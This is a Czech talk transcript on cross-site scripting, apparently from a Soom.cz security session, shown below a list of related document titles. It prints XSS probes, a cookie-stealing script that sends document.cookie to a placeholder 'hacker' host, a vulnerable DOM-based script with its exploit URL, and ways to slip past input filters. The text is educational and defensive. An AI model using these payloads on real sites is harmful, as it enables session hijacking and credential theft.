Web Application Security aneb další. rozměr hackingu. XanthiX Soom session IV



Podobné dokumenty
Cross-Site Scripting (XSS)

Cross- Site Request Forgery

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013

Testování webových aplikací Seznam.cz

Vývoj Internetových Aplikací

Hitparáda webhackingu nestárnoucí hity. Roman Kümmel

Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz

Úvodem 9. Zpětná vazba od čtenářů 10 Zdrojové kódy ke knize 10 Errata 10. Než začneme 11

Vyšší odborná škola a Střední škola,varnsdorf, příspěvková organizace. Šablona 14 VY 32 INOVACE

Bezpečnost sítí, Firewally, Wifi. Ing. Pavel Píše

CISCO CCNA I. 8. Rizika síťového narušení

Vývoj internetových aplikací. 9. Útoky na internetové aplikace. a možná obrana proti nim

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Útoky na certifikační autority a SSL

MBI - technologická realizace modelu

Penetrační test & bezpečnostní audit: Co mají společného? V čem se liší?

Datové schránky ante portas

Obrana sítě - základní principy

KIV/PIA 2012 Ing. Jan Tichava

Informační a komunikační technologie. 1.5 Malware

JavaScript 101. "Trocha života do statických stránek"

HLEDEJCENY.mobi. Obsah. Mobilní verze e-shopu. Důvody instalace

Jak ochráníte svoji síť v roce 2015? Michal Motyčka

Content Security Policy

Formuláře. Internetové publikování. Formuláře - příklad

NESMRTELNÝ CROSS-SITE SCRIPTING

WiFi4EU Komponent sloužící k prosazování politiky. Prováděcí příručka verze 1.0

Bezpečnostn. nostní novinky v Microsoft Windows Server Jaroslav Maurenc Account Technology Specialist Microsoft Česká republika

MODERNÍ WEB SNADNO A RYCHLE

Schéma e-pošty. UA (User Agent) rozhraní pro uživatele MTA (Message Transfer Agent) zajišťuje dopravu dopisů. disk. odesilatel. fronta dopisů SMTP

Co musíte udělat po instalaci WordPressu. Vlastimil Ott

C6 Bezpečnost dat v Internetu. 2. HTTP komunikace 3. HTTPS komunikace 4. Statistiky

HTML - Úvod. Zpracoval: Petr Lasák

Jen správně nasazené HTTPS je bezpečné

Obecní webové stránky.

Formuláře. Internetové publikování

Principy fungování WWW serverů a browserů. Internetové publikování

Škodlivý kód, útok na aplikace. Ing. Miloslav Hub, Ph.D. 5. prosince 2007

Zabezpečení web aplikací

(X)HTML, CSS a jquery

Inovace bakalářského studijního oboru Aplikovaná chemie

Protokol HTTP 4IZ228 tvorba webových stránek a aplikací

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni

Návrh uživatelského rozhraní Jednoduchý portál s recepty D1 + D2

DNSSEC Validátor - doplněk prohlížečů proti podvržení domény

Útoky na HTTPS. PV210 - Bezpečnostní analýza síťového provozu. Pavel Čeleda, Radek Krejčí

Bezpečnost B2B přes ISDS Aktuální výzvy a jejich řešení

PŘEHLED A MOŽNOSTI VYUŽITÍ WEBOVÝCH MAPOVÝCH SLUŽEB

Uživatelská příručka 6.A6. (obr.1.)

Co se děje za Firewallem. Máte zajištěna data a funkce systémů před útokem z vnitřního segmentu sítě?

Hacking Jak reálná je tato hrozba? Jak se jí bránit?

3 MOŽNÉ PŘÍSTUPY K TVORBĚ APLIKACÍ NAD SVG DOKUMENTY

ver Asynchronní E-learningový

Obsah. Rozdíly mezi systémy Joomla 1.0 a Systém Joomla coby jednička online komunity...16 Shrnutí...16

NSWI096 - INTERNET JavaScript

Základy HTML, URL, HTTP, druhy skriptování, formuláře

Personální evidence zaměstnanců

PŘÍLOHA C Požadavky na Dokumentaci

Exploitace zranitelností. Obsah

2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS)

Obsah. Úvodem 9. Kapitola 1 Než začneme 11. Kapitola 2 Dynamické zobrazování obsahu 25. Zpětná vazba od čtenářů 10 Zdrojové kódy ke knize 10 Errata 10

Bezpečnost a bezpečné programování

Pavel Kaňkovský, DCIT Consulting. SOFTECON

1. Úvod do webových aplikací

1. Úvod do Ajaxu 11. Jak Ajax funguje? 13

Analýza zranitelností databází. Michal Lukanič, Database Specialist

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy

Uživatel počítačové sítě

Ekosystém Darknetu. Ing. Martin Klubal.

Nová struktura souborů a složek

Nový redakční systém pro detsky-web.cz /.sk

Koláčky, sezení. Martin Klíma

Úvod do aplikací internetu a přehled možností při tvorbě webu

Jiří SLABÝ Deloitte Téma: Bezpečnost informací zajímavé trendy nedávné minulosti Zajímavé statistiky a trendy z oblasti kybernetické bezpečnosti uplyn

Nová cesta k internetové bezpečnosti

Malware. počítačové viry, počítačové červy, trojské koně, spyware, adware

Připravil: Ing. Jiří Lýsek, Ph.D. Verze: Webové aplikace


Javascript. Javascript - jazyk

Technická specifikace Platební brána IBS

RSS : RSS

Obsah přednášky. Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework

Uživatelská příručka aplikace E-podatelna

Přidat položku Upravit Vložit zboží

Turris Omnia: jak lovit hackery

Vývoj Internetových Aplikací

Databázové aplikace pro internetové prostředí PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku

Internet protokol, IP adresy, návaznost IP na nižší vrstvy

Uživatelská příručka aplikace E-podatelna

Pokročilé techniky XSS

PŘEDMLUVA... PODĚKOVÁNÍ...

Část IV - Bezpečnost 21. Kapitola 19 Bezpečnostní model ASP.NET 23

UŽIVATELSKÁ BEZPEČNOST INFORMAČNÍCH SYSTÉMŮ

PENETRAČNÍ TESTY CYBER SECURITY

Výzkum v oblasti kybernetické bezpečnosti

HTML - pokračování. Co už víme?

WR Reality. Web Revolution. Uživatelský manuál administračního rozhraní

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě

Ochrana prezentací vytvořených v systému Visual PHP proti vnějším útokům

PHP PHP je skriptovací programovací jazyk dynamických internetových stránek PHP je nezávislý na platformě

Transkript:

Web Application Security aneb další rozměr hackingu XanthiX

Struktura Uvedení do problematiky Vlastní výzkum v oblasti WAS Praktické ukázky

Síla XSS aneb may the force be with you! Prohlížeč nebo systém m oběti nemusí být vůbec náchylný n vůčv ůči žádné známé zranitelnosti. Závislost na důvěřd ěře e v bezpečně napsanou a odladěnou navštívenou venou stránku. Imunní vůči i klasickému zabezpečen ení (SSL/TLS, firewall)

Princip XSS Typicky injekce HTML/javascript Interpretuje se v prohlížeči i uživateleu Persistentní vs. Non-persistentn persistentní kód Zranitelný server slouží pouze jako zprostředkovatel útočníkových záměrů. z Vyžaduje 3 strany.

Jak je možné vyvolat XSS 1) Úmysl autorizovaného vlastníka stránky 2) Vložen ení záškodného Javascriptu exploitací zranitelnosti síťovs ové vrstvy nebo zranitelnosti hostitelského systému s využit itím 3) Vložen ením m scriptu do veřejn ejné oblasti webstránek (diskusní fóra a spol.-viz příklad p Kyberia.sk) 4) Podstrčen ení speciáln lně upraveného URL odkazu oběti (non-persistentn persistentní nebo DOM based viz 2 příklady) p

Pohled útočníka Pátrá po místech m na stránce, kde to, co vloží se po zpracování dotazu odzrcadlí na stránce (klasicky přes p search box). Následně zkouší otestovat možnost provedení JavaScriptu např.: "><SCRIPT>alert('XSS positive')</script>

Možnosti útočníka Odchycení relace (session hijacking) Odposlech stlačených kláves Hackování vnitřní sítě (typicky za NATem) Ukradení historie navštívených vených webů DoS Přesměrování na web útočníka (window.location= URL URL )

Možnosti propagace non- persistentního XSS v URL E-mail (spam) Diskusní fóra Chat/IM (např.. ICQ) atd dal další nápady? Napadené URL vypadá důvěryhodně, protože e obsahuje validní DNS hostname existujícího serveru.

Příklad simulovaného útoku <script>alert(document.cookie document.cookie)</script> způsob sobí zobrazení cookie pomocí pop-up. Útočník k požaduje zaslání cookie na server <script> var x=new Image(); x.src= http://hacker"+document.cookie; </script>

DOM-Based XSS (zranitelnost na straně serveru) Mějme následujn sledující skript na straně serveru var url = window.location.href; var pos = url.indexof("title=") + 6; var len = url.length; var title_string = url.substring(pos,len); document.write(unescape(title_string)); (viz ukázka DOM-based server vulnerability.html)

DOM-Based XSS (zranitelnost na straně serveru) http://server?product_id=100&title= Foo#<SCRIPT>alert('XSS positive') </SCRIPT> Na straně serveru nedetekovatelný J >> Znak # způsob sobí, že řetězec za tímto t znakem není posílán n na server, ale je zpracován n pouze lokáln lně na straně klienta.

Možnosti propagace persistentního XSS Fóra Komentář blogu Hodnocení produktu Chatovací místnosti HTML e-mailye Wiki stránky atd dal další nápady?

Výhody persistentního XSS oproti non-persistentn persistentnímu Je nebezpečnější - jakmile oběť navštíví infikovanou stránku dochází k vykonání kódu (není typicky požadov adována explicitní akce útočníka-kliknutí na odkaz) Jediná (mnou známá) ) efektivní obrana je vypnutí vykonávání JavaScriptu v prohlížeči i při p brouzdání sítí.. Znáte další ší? Je potřeba důvěřd ěřovat nejen informačnímu mu zdroji, ale i prostředku, jak jsme se k danému zdroji dostali (URL zaslané v e-mailu e nedůvěryhodným zdrojem můžm ůže e obsahovat XSS)

Kamufláže e vkládaných funkčních elementů před filtrací vstupu Prokládání kódu binárn rní nulou 0x00 [IE] Substituce typicky např. < a > (např. URL encoded %3c a %3e nebo přičtenp tení ordináln lní hodnoty 128 chyba IE při p kódování us-ascii)

Pikošky ky na závěrz možnost odchycení autentizačních údajů nepozorných uživatel u za pomoci odkazu na obrázek J (viz ukázka) Kde lze útok provést? na všech v místech, m kde je možné vložit odkaz na obrázek odkazující se na externí zdroj pomocí elementu <img src= utocnikovo.php utocnikovo.php > Ukázka google-hackingu (inurl:"robot.txt" inurl:"robots.txt" ) intext:disallow filetype:txt

Shrnutí Více než 50% (edit - 90%) webu není vůči i těmto t typům útoků imunní ÚTOK JavaScript jako onmouseover, onmouseout, v PDF[IE], v PNG[IE], použit ití bílých míst m (0x08,0x09,0x00[IE]), jiná interpretace znaků >, < URL-encoded encoded OBRANA Vstupy, testovat, testovat, testovat!!! Betaverze ideáln lně nechat prověř ěřit nezávislými pentestery Vypínat JavaScript při p i návštěvěn nedůvěryhodn ryhodného webu.

Myšlenka z praxe V případp padě odhalení zranitelnosti na renomovaných serverech je (ekonomicky) výhodnější o chybě informovat administrátory tory než média (nabídka zajímav mavé spolupráce, finanční odměna)

Další zdroje Ha.ckers.org Owasp.org Watchfire.com (webcast archive) Acunetix.com My ICQ 333-508 508-250 mailto:xanthix@gmail.com